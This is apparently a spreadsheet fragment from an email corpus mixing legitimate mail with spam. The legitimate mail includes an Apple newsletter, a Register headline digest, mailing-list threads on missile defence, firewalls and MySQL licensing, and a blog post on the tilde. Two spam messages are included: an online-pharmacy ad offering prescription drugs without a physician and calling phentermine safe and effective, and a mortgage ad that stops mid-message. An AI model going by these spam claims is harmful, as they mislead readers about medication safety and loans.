 		*iTunes software may be used to reproduce materials. It is licensed to 
 		you only for reproduction of non-copyrighted materials, materials in which 
 		you own the copyright, or materials you are authorized or legally permitted 
 		to reproduce. &lt;br&gt;
 		&lt;br&gt;
 		&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/white_apple.gif" width="25" height="31"&gt;&lt;br&gt;
 		&lt;BR&gt;
 		Copyright &amp;#169; 2002 Apple Computer Inc. &lt;A HREF="http://www.apple.com/uk/legal"&gt;All 
 		Rights Reserved&lt;/A&gt;.&lt;br&gt;
 		&lt;a href="http://registration.euro.apple.com/applenews/uk/subscribe"&gt;Subscribe&lt;/a&gt; 
 		/ &lt;a href="http://registration.euro.apple.com/applenews/uk/change"&gt;Change 
 		Address&lt;/a&gt; / &lt;a href="http://registration.euro.apple.com/applenews/uk/unsubscribe"&gt;Unsubscribe&lt;/a&gt; 
 		/ &lt;a href="http://www.apple.com/uk/legal/privacy/"&gt;Apple Privacy Policy&lt;/a&gt; 
 		/ &lt;a href="http://store.apple.com/Catalog/uk/Images/salespolicies.html"&gt;Store 
 		Policies&lt;/A&gt;&lt;/BLOCKQUOTE&gt;&lt;/font&gt;
 	&lt;/td&gt;
 			&lt;td width="5" NOWRAP&gt;&lt;/td&gt;
 			&lt;td width="1" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" NOWRAP&gt;&lt;IMG SRC="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" HEIGHT="1" WIDTH="1"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;!--End Ts and Cs--&gt;
 	&lt;!--Start Cap Span--&gt;
 		&lt;tr&gt;
 			&lt;td colspan="5"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/bottom_cap.gif" width="598" height="13"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;!--End Cap Span--&gt;
 	&lt;!--Start Shell Guide --&gt;
 		&lt;tr&gt;
 			&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="5" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="586" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="5" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;!--End Shell Guide --&gt;
 	&lt;/table&gt;&lt;map name="top_cap_map"&gt; 
 		&lt;area href="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http://www.apple.com/uk/&amp;P=ie_header1" shape="rect" coords="3,66,147,88"&gt;
 		&lt;area href="mailto:?body=http://registration.euro.apple.com/asnews/subscribe/current/ie/" shape="rect" coords="152,66,296,88"&gt;
 		&lt;area href="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http://promo.euro.apple.com/promo/10_reasons/uk/&amp;P=ie_header3" shape="rect" coords="301,66,446,88"&gt;
 		&lt;area href="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http://www.apple.com/irelandstore/&amp;P=ie_header4" shape="rect" coords="451,66,595,88"&gt;
 	  &lt;/map&gt;
 	&lt;br&gt;
 &lt;!--END Ts and Cs--&gt;
 &lt;img src="http://www.komtools.net/spacer/spacer.fdml?F=asenews-november" width="1" height="1"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --EG3OZ08L.0DOB2JAQ-euro.apple.com--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Wednesday July 10
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     EU report calls for widespread open source adoption
     The only way for governments to share software and save money, it says
         http://www.theregister.co.uk/content/4/26102.html
     MS poised to announce .NET Server RC1?
     The entrails look promising...
         http://www.theregister.co.uk/content/4/26100.html
 Enterprise Systems
     HP releases Itanium 2 benchmark data
     Timp goes mad on benchmarks...
         http://www.theregister.co.uk/content/53/26095.html
 Semiconductors
     HP roadmaps Itanium futures as McKinley debuts
     HP goes mad on mountain themes...
         http://www.theregister.co.uk/content/3/26097.html
     HP releases Itanium 2 benchmark data
     Timp goes mad on benchmarks...
         http://www.theregister.co.uk/content/3/26095.html
 Internet
     BT Retail to flog 24/7 Net access
     All Together now...
         http://www.theregister.co.uk/content/6/26107.html
     WorldCom takes the Fifth
     They'll need it
         http://www.theregister.co.uk/content/6/26106.html
     Web site censored over pictures of traffic wardens 
     Meter maids 'harassed, alarmed and distressed'
         http://www.theregister.co.uk/content/6/26104.html
     P45s for Porn Surfers 
     Net 'misuse' sackings on the rise
         http://www.theregister.co.uk/content/6/26098.html
 Business
     WorldCom takes the Fifth
     They'll need it
         http://www.theregister.co.uk/content/7/26106.html
     Sun shines on Scots job market
     StarCat production transferred to Silicon Glen
         http://www.theregister.co.uk/content/7/26105.html
     Buffet and friends sub Level 3 $500m for acquisitions
     Chap 11 to predator in 60 seconds...
         http://www.theregister.co.uk/content/7/26096.html
     ROI faulty as measurement of IT success - survey
     Sums don't always add up properly
         http://www.theregister.co.uk/content/7/26094.html
 Networks
     Mitel cuts staff hours to pare payroll
     10% less work, 10% less pay
         http://www.theregister.co.uk/content/5/26109.html
 Broadband
     Europe unhappy over local loops 
     Legal action looming
         http://www.theregister.co.uk/content/22/26103.html
     Broadband users called to protest against BT
     People power to take on 'crap service'
         http://www.theregister.co.uk/content/22/26099.html
 The Mac Channel
     Celebrity Apple cronies silent on community expulsions
     Pass the cake
         http://www.theregister.co.uk/content/39/26110.html
 BOFH: Whole Shebang
     The Bastard Vending Machine
     Episode 15 Nasty Cola
         http://www.theregister.co.uk/content/30/26111.html
 About The Register
     Here Comes the Sun, da da da da
     It-minds hot cup of Java beats the summertime blues
         http://www.theregister.co.uk/content/31/26101.html
 Bootnotes
     Why Microsoft C# is 'paralysed or dead'
     Letters The C Octothorpe Blues 
         http://www.theregister.co.uk/content/28/26108.html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</si>
  <si>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On Wed, 2002-07-24 at 16:46, bitbitch@magnesium.net wrote:
 &gt; &gt;
 &gt; &gt; Hit or miss, Groundhog Day 2019 is going to be one heck of a show. Book
 &gt; &gt; early, avoid the rush.
 &gt; 
 &gt; Hey, meybee by then, Bush's grand plan for a missle defense system will
 &gt; actually pan out and -work- ...
 &gt; I'm not holding my breath, but i'm not going to panic for something thats
 &gt; a little under 17 years away, either.
 I don't think a ballistic missile defense system will be much help
 against a rock a couple thousand kilometers in diameter.  That's WAY
 outside the design spec for any such system.  Particularly when
 ballistic intercept designs usually don't have any type of warhead
 associated with them, either being kinetic or directed energy weapons.
 Contrary to popular belief, ballistic missile defense isn't a hard
 problem (ignoring whether or not it is useful).  The only real challenge
 is materials science, as it really pushes the envelope of materials
 performance requirements to places they've never been; there has been
 some technology crossover with some of the new materials and processes
 they've had to come up with.  The actual discrimination algorithms,
 while way more advanced than anything you'll see in the private sector
 (and classified, to keep it that way), are usually run on a crusty old
 MIPS R3k embedded processor or similar, with a low-to-mid range DSP to
 help out. It is not computationally intensive by any means.
 I used to be tangentially involved in various ballistic missile
 intercept weapon programs many years ago and am pretty familiar with the
 technologies that go into them.  Most of the arguments against it from a
 technological standpoint are ignorant bullshit, and have lead me to
 believe that hardly anyone understands the technical parameters of
 ballistic missile intercept.  And the arguments that are made without
 reference to the capability of the technology are neither particularly
 convincing nor conclusive.
 In summary:
 1) Ballistic missile intercept technology is useless on a big rock.  You
 are much better off using heavy-lift space technology to deliver a big
 nuke (or small nuke, depending on your plan). 
 2) State-of-the-art ballistic missile intercept technology is far more
 competent than most people imagine it is, and has discrimination
 capabilities that exceed most popular belief.  It better be -- they've
 had twenty years to work on it.
 3) I've never heard a really convincing argument against deploying
 ballistic missile intercept technology, particularly considering most of
 the R&amp;D investment has already been made. I don't really care about it
 one way or the other, but I also don't see why other people have fits
 over it either.
 Cheers,
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: bhgb
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;
 &lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" link="#636DAD" vlink="#636DAD" alink="#636DAD"&gt;
 &lt;table border="0" width="90%" cellspacing="0" cellpadding="6" style="border-collapse: collapse" bordercolor="#111111"&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;font face="Arial Rounded MT Bold" size="7" color="#636DAD"&gt;&amp;nbsp; &lt;a href="http://www.royalmeds.com/main2.php?rx=17741" style="text-decoration: none"&gt;Royal Meds&lt;/a&gt;&lt;/font&gt;&lt;i&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741" style="text-decoration: none"&gt;&lt;font face="Arial Rounded MT Bold" color="#636DAD"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font face="Arial Rounded MT Bold" color="636DAD" size="4"&gt;&amp;nbsp; y o u r&amp;nbsp;&amp;nbsp; o n l i n e&amp;nbsp;&amp;nbsp; p h a r m a c y&lt;/font&gt;&lt;/a&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;u&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial Rounded MT Bold" size="4" color="#FF0000"&gt;NO Physician's Consultation Fee that's a saving of $125.&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/u&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;i&gt;&lt;b&gt;&lt;font color="#000000"&gt;We Offer The Widest Range Of Prescription Drugs Available Through&lt;/font&gt; &lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Online Ordering&lt;/a&gt;.&lt;/b&gt;&lt;/i&gt;&lt;ul&gt;
 &lt;li&gt;&lt;font face="Arial" size="2"&gt;Your online pharmacy for &lt;i&gt;&lt;b&gt;FDA approved&lt;/b&gt;&lt;/i&gt; drugs through a online consultation.&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial" size="2"&gt;No more embarrassing doctor visits, we offers confidential ordering online.&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial" size="2"&gt;Take advantage of some of best prices available on the Internet! &lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial" size="2"&gt;We offer the widest range of drugs available through online ordering.&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial" size="2"&gt;By using Internet Technology, we allow you to get what you need anonymously and conveniently. &lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial" size="2"&gt;All packages shipped via FedEx in plain packaging to protect your privacy.&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font face="Arial Rounded MT Bold"&gt;&lt;i&gt;&lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;&lt;font size="5"&gt;Click here to see how Royal Meds can help you&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border="0" cellpadding="10" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="90%" id="AutoNumber1"&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;span class="special-red"&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial" color="#FF0000"&gt;VIAGRA only $7 per dose and discounts on refills.&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;font color="#FF0000" face="Arial"&gt;&lt;span class="special-red"&gt;&lt;br&gt;
 &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;Viagra (Sexual)&lt;/b&gt; Intended for men with erectile dysfunction (ED), it helps most men to get and keep an erection when they get sexually excited. No need to go through embarrassing, stressful situation anymore, you can now get Viagra from the comfort of your home. &lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;font face="Arial" size="2"&gt;&lt;b&gt;Phentermine (Weight-Loss)&lt;/b&gt; Obesity weight loss drug. It enables people to burn more fat doing nothing, stimulating your nervous system. You will feel the difference! It will give you more energy, you will become more active! It's an appetite suppressant, you'll burn fat easier and eat less. It is a both safe and effective treatment to lose weight. &lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;font face="Arial" size="2"&gt;&lt;b&gt;Zyban (Stop Smoking)&lt;/b&gt; is the first nicotine-free pill that, as part of a comprehensive program from your health care professional, can help you stop smoking. Its prescription medicine available only from your health care professional for smokers 18 and older. &lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;font face="Arial" size="2"&gt;&lt;b&gt;PROPECIA (Hair Loss)&lt;/b&gt; is a medical breakthrough. The first pill that effectively treats male pattern hair loss on the vertex (at top of head) and anterior mid-scalp area. &lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;font face="Arial" size="2"&gt;&lt;b&gt;Celebrex&amp;nbsp; (Pain-Relief)&lt;/b&gt; Provides relief from the pain and inflammation suffered by those who have adult rheumatoid arthritis. It was introduced to the United States in early 1999. It is the number one arthritis medication used in the United States. Clebrex basically reduces the pain arthritis sufferers have. They then can go through daily activities like standing, walking, lying down, sitting up and climbing stairs much easier. &lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%"&gt;
 &lt;font face="Arial" size="2"&gt;&lt;b&gt;Valtrex (Treatment for Herpes) &lt;/b&gt;suppresses future genital herpes outbreaks for those diagnosed with the disease. It is a once-a-day prescription medication that works by disrupting the virus from reproducing itself. There is no cure for genital herpes but Valtrex helps stall the virus from spreading through the body. Taking Valtrex has effectively stalled herpes for up to one year. The recommended dosage for Valtrex is one gram, once a day. Valtrex should only by used by adults with regular immune systems.&amp;nbsp; &lt;b&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17741"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;p align="left"&gt;&amp;nbsp;&lt;p align="left"&gt;&amp;nbsp;&lt;p align="left"&gt;&amp;nbsp;&lt;p align="left"&gt;&amp;nbsp;&lt;p align="left"&gt;&amp;nbsp;&lt;p align="left"&gt;&lt;font size="2" face="Arial"&gt;&lt;b&gt;Unsubscribe Information:&lt;/b&gt;&lt;br&gt;
 This email is intended to be a benefit to the recipient. If you would like to opt-out and not receive any more marketing information please &lt;a href="http://worldrxco.com/remove.php"&gt;click here&lt;/a&gt; . Your address will be removed within 24hrs. We sincerely apologize for any inconvenience.&lt;/font&gt;&lt;/body&gt;&lt;/html&gt;
 ggtqgvmmpykgbwgf
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: History of the tilde
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/04.html#history_of_the_tilde
 Date: 2002-10-04T00:27:41-05:00
 So I was researching the history of the tilde, because D told me that her 
 company just installed a new web proxy that denies access to any URL with a 
 tilde in it. Presumably because the presence of a tilde indicates with 
 remarkable accuracy a personal site, and apparently her employer believes that 
 reading personal sites is not an appropriate use of company time. Which, to be 
 honest, is probably accurate, given the nature of her work. But never mind 
 that. I don't want to talk about corporate politics. I want to talk about the 
 tilde. 
 Every command-line-loving geek will tell you that ~ stands for &amp;#8220;home 
 directory&amp;#8221;, and cd ~ will take you to your home directory. (cd ~username 
 will take you to someone else's, except on Mac OS X, where it will take you to 
 their Public file sharing directory.) It is from this heritage that we can 
 trace the present-day practice of using tildes in URLs to denote personal 
 pages, since one single system-wide configuration allowed individual users to 
 have their own web sites by storing files in their own home directory. Or, more 
 commonly now that Apache has taken over the world, in their public_html 
 subdirectory, except on Mac OS X, where if you turn on web sharing and point 
 your browser to http://localhost/~username/, you're actually being served files 
 from that user's Sites directory within their home directory. 
 But I don't want to talk about Mac OS X. I want to talk about the tilde. 
 As with so many other things, I find that Jukka Korpela[1] is the expert in 
 this field. Jukka is no doubt a member of my karass[2], a word which Google (
 old habits die hard[3]) feels is best explained by the personal site of Eugene 
 Wallingford, which, like Jukka's home page, can not be referenced without a 
 tilde. 
 In fact, Jukka has written a lengthy treatise on why the tilde should not be 
 used in URLs[4], a treatise which, I feel obliged to point out, contains a 
 tilde in its URL. 
 Clearly, the tilde is underappreciated. 
 Digging further, we find this post of Jukka's from 1998[5], in which we learn 
 that the tilde was not meant to be the tilde at all, but rather an odd 
 character called the overline. Presumably to balance out the underline, if 
 indeed those sorts of things require balance. There is balance in the universe, 
 to be sure, but I am less sure that it eminates from my keyboard. No matter. 
 The tilde was the tilde so that Spanish-typing types could type the &amp;ntilde; 
 (now referenced in HTML as the named entity &amp;ntilde;), but somewhere along 
 the line, it morphed into a general-purpose character with all sorts of geeky 
 uses. 
 Digging even further, it appears that the tilde was originally an alternate for 
 #[6], then an alternate for ^, and its life as an overline replacement came 
 even later. Jukka confirms this[7] and adds a timeline: 1963 for #, 1964 for ^, 
 1966 for overline. Then June 30, 1966, the watershed moment in an X3 committee 
 meeting, when it was proposed &amp;#8220;as exclusively a tilde in USA to appease 
 SHARE&amp;#8221;. I can find no further reference as to what this acronym means, or 
 what this committee meeting was about. The next reference isn't until 1991, 
 when the tilde was officially added to ISO-646[8]. 
 And now, down the rabbit hole we go. Scouring Usenet (which the kids of 
 yesterday called &amp;#8220;Deja News&amp;#8221;, and kids today call &amp;#8220;Google 
 Groups&amp;#8221;), we find a reprint of a 1991 William Safire (yes, _that_ William 
 Safire) article On Language[9], in which we learn that ~ is officially 
 pronounced &amp;#8220;squiggle&amp;#8221;. This is confirmed by the Jargon Dictionary
 [10] to this very day. I'm not sure this is useful, but I just thought it was 
 cool to see William Safire writing about the proper pronunciation of various 
 ASCII characters. 
 As early as August 1990, tilde was included in the waka waka bang splat poem
 [11]. 
 In July 1989, Kermit gained support for filenames containing a tilde[12]. 
 In February 1988, an editor's note to an otherwise unrelated article notes that 
 Fidonet supported ASCII characters space through tilde[13]. 
 As early as January 1987, less used the tilde to denote lines past EOF[14]. 
 As early as July 1986, troff supported the tilde[15]. 
 In November 1985, a mod.sources post refers to Bourne shell enhancements 
 (history,tilde,job control)[16]. 
 As early as January 1984, tilde was included on the DEC keyboard[17] and listed 
 in the APL-11 character set[18]. 
 In April 1983, tilde was causing bugs in vi[19] (actually due to underlying 
 bugs in csh). 
 In December 1982, ~ is officially pronounced &amp;#8220;tilde&amp;#8221;[20], prompting 
 this typographical pun[21]. 
 And that's the earliest reference I can find. 
 So where does that leave us? Unsatisfied, no doubt. There is history here, but 
 there are gaps. What happened at that watershed meeting in 1966? How did the 
 tilde rise to prominence in the 1980s? When did it become a synonym for 
 &amp;#8220;home directory&amp;#8221;? When did it migrate into the world of web servers 
 to provide a cheap and simple way of giving individual users their own web 
 sites? I don't know, and the lateness of the hour prevents me from continuing 
 my research, a failing for which I apologize profusely. Goodnight, goodnight. 
 May you dream of tildes, stars, and whorls.
 [1]  http://www.cs.tut.fi/~jkorpela/
 [2]  http://www.cs.uni.edu/~wallingf/personal/bokonon.html#words
 [3]  http://diveintomark.org/archives/2002/10/03.html#when_an_engineer_flaps_his_wings
 [4]  http://www.cs.tut.fi/~jkorpela/tilde.html
 [5]  http://groups.google.com/groups?selm=3627ac95.66099519%40news.cs.hut.fi
 [6]  http://groups.google.com/groups?selm=an_600051281
 [7]  http://www.cs.tut.fi/~jkorpela/latin1/ascii-hist.html#7E
 [8]  http://czyborra.com/charsets/iso646.html
 [9]  http://groups.google.com/groups?selm=735627391.AA02027%40Clone.his.com
 [10] http://info.astrian.net/jargon/terms/a/ASCII.html
 [11] http://groups.google.com/groups?selm=14595%40shlump.nac.dec.com
 [12] http://groups.google.com/groups?selm=CMM.0.88.616446576.cmg%40watsun.cc.columbia.edu
 [13] http://groups.google.com/groups?selm=4036%40hoptoad.uucp
 [14] http://groups.google.com/groups?selm=669%40kodak.UUCP
 [15] http://groups.google.com/groups?selm=3197%40jhunix.UUCP
 [16] http://groups.google.com/groups?selm=2428%40cal-asd.fluke.UUCP
 [17] http://groups.google.com/groups?selm=778%40brl-bmd.UUCP
 [18] http://groups.google.com/groups?selm=2405%40decwrl.UUCP
 [19] http://groups.google.com/groups?selm=bnews.ucf-cs.904
 [20] http://groups.google.com/groups?selm=bnews.ucbcad.162
 [21] http://groups.google.com/groups?selm=bnews.hp-pcd.546
</t>
  </si>
  <si>
    <t xml:space="preserve">Ned Jackson Lovely wrote:
  &gt; On Wed, Jul 31, 2002 at 10:37:31AM -0600, Marty Halvorson wrote:
  &gt; &gt; A Forest Service official has stated flat out that the tree lovers 
 need to
  &gt; &gt; understand their responsibility in contributing to the number of
  &gt; &gt; uncontrollable (i.e., crown fires caused by very dense tree stands and
  &gt; &gt; under growth) fires by their suits to stop any tree removal from the
  &gt; &gt; forests managed by the Forest Service.
  &gt;
  &gt; Boy, that is rather strange. I've always been under the impression that
  &gt; the uncontrollable forest fires were the result of the Forest Service's
  &gt; long-standing "10:00 A.M. policy"
 If you'll look closely, I said the Forest Service official claimed it was 
 the tree lovers lawsuits that prevented removal of trees by any means as at 
 least partially responsible.  The lawsuits prevented the Forest Service 
 from implementation of any project that involved tree removal.  These 
 projects were designed to address the tree and undergrowth density that 
 resulted from previous management policies.
 In other words, Forest Service projects to clean up the mess resulting from 
 their previous forest management practices are prevented by tree lover 
 lawsuits.
  &gt; 40 years after the end of the containment policy there is still a lot of 
 stuff
  &gt; left to burn.
 Exactly, and tree lover lawsuits are preventing the removal of that 
 stuff.  The result:  Fires like Cerro Grande.
  &gt; I can't imagine that artificially planted replacement
  &gt; forests ...
 There are very few replacement forests planted these days.  Those that are, 
 are mostly planted on private land as commercial tree farms.
 Peace,
 Marty Halvorson
 marty@halvorson.us
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] ADSL, routers and firewalls
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm configuring this at the moment. -&gt; Still ;--)
 I found out that my firewall box has a dodgy USB and so I'm awaiting a
 PCI-USB controller to finish the configuration. I meant to buy one yesterday
 and forgot. I've bought Smoothwall Corporate edition as its the best
 firewall/routing solution around or so I've been led to believe. 
 Will be doing NAT/Proxy/firewall, maybe VPN too but we shall see. 
 CW
 -----------
 Hi all,
 	I am seriously thinking of getting the ADSL "solo" connection
 from Eircom. I also have more than one computer therefore I need a router
 so that I can connect them together.
 The 2 options I am looking at are : 
   the ADSL usb modem connected to my linux machine, with the linux
 	machine acting as firewall; and
   a combined router / firewall box which would be connected directly
 	to the ADSL modem.
 So my questions are : 
 	what recommendations would any of you have about the above ?
 	do I need to have NAT (I have only a vague idea of what this does )?
 	what other options should I be looking at ?
 Thanks
 Con
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] mysql, C++ &amp; [L]GPL
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I'm going to be using MySQL in an upcoming project (and probably
 buying their support license), and I'm wondering if anyone else
 has used any libraries to link a proprietary C++ project to a
 MySQL database. From what I can see on the MySQL website, their
 MySQL++ library is under the GPL, but there's also some documents
 which list it as under the LGPL.
 Anyone got any experience with this, or has used a different
 library to link C++ and MySQL under Linux?
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; - A program that acts both as a pop client and a pop server.  You
 &gt; &gt;   configure it by telling it about your real pop servers.  You then
 &gt; &gt;   point your mail reader to the pop server at localhost.  When it
 &gt; &gt;   receives a connection, it connects to the remote pop servers, reads
 &gt; &gt;   your mail, and gives you only the non-spam.
 &gt; 
 &gt; FYI, I'll never trust such a scheme:  I have no tolerance for false
 &gt; positives, and indeed do nothing to try to block spam on any of my email
 &gt; accounts now for that reason.  Deliver all suspected spam to a Spam folder
 &gt; instead and I'd love it.
 Another config parameter.
 The filter could add a header file.  Or a ~ to the subject if you like
 that style. :-)
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Competitive Mortgage Rates
</t>
  </si>
  <si>
    <t xml:space="preserve">Here It Is!!!! zzzz ,
 &lt;HTML&gt;&lt;BODY BGCOLOR="#000000"&gt;&lt;FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;P ALIGN=CENTER&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#ffff80" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;Mortgage companies make you wait...They Demand to Interview you...&lt;BR&gt;
 They Intimidate you...They Humiliate you...&lt;BR&gt;
 And All of That is While They Decide If They Even Want to &lt;BR&gt;
 Do Business With You...&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=4 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;We Turn the Tables on Them...&lt;BR&gt;
 Now, You're In Charge&lt;/FONT&gt;&lt;FONT  COLOR="#ffff80" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;Just Fill Out Our Simple Form and They Will Have to Compete For Your Business...&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#0000ff" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;&lt;A HREF="http://202.108.221.18/www425/"&gt;
 CLICK HERE FOR FORM&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ffff80" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;We have hundreds of loan programs, including:&lt;/B&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;&lt;I&gt;Purchase Loans&lt;BR&gt;
 Refinance&lt;BR&gt;
 Debt Consolidation&lt;BR&gt;
 Home Improvement &lt;BR&gt;
 Second Mortgages&lt;BR&gt;
 No Income Verification&lt;/B&gt;&lt;/I&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
